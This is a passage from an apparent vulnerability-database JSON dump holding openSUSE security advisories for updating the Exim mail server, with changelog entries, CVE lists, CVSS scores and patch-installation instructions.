security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the errormessage once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no long accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line receipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, whick has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naiive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficieny of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector ise set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attemtped). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver not provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. (This seemes to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, which built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interface can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currrectly use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-677=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-07T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-07T00:00:00", "id": "OPENSUSE-SU-2021:0677-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4UGIR4NXSH3ADTQNJZHHL5EVSFNXRGTQ/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 30 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n exim was updated to 4.94.2:\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n update to exim 4.94\n\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the errormessage once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - don't create logfiles during install\n * fixes CVE-2020-8015 (boo#1154183)\n\n - add a spec-file workaround for boo#1160726\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no long accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line receipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, whick has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naiive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficieny of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector ise set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attemtped). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver not provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. (This seemes to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, which built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interface can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currrectly use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add 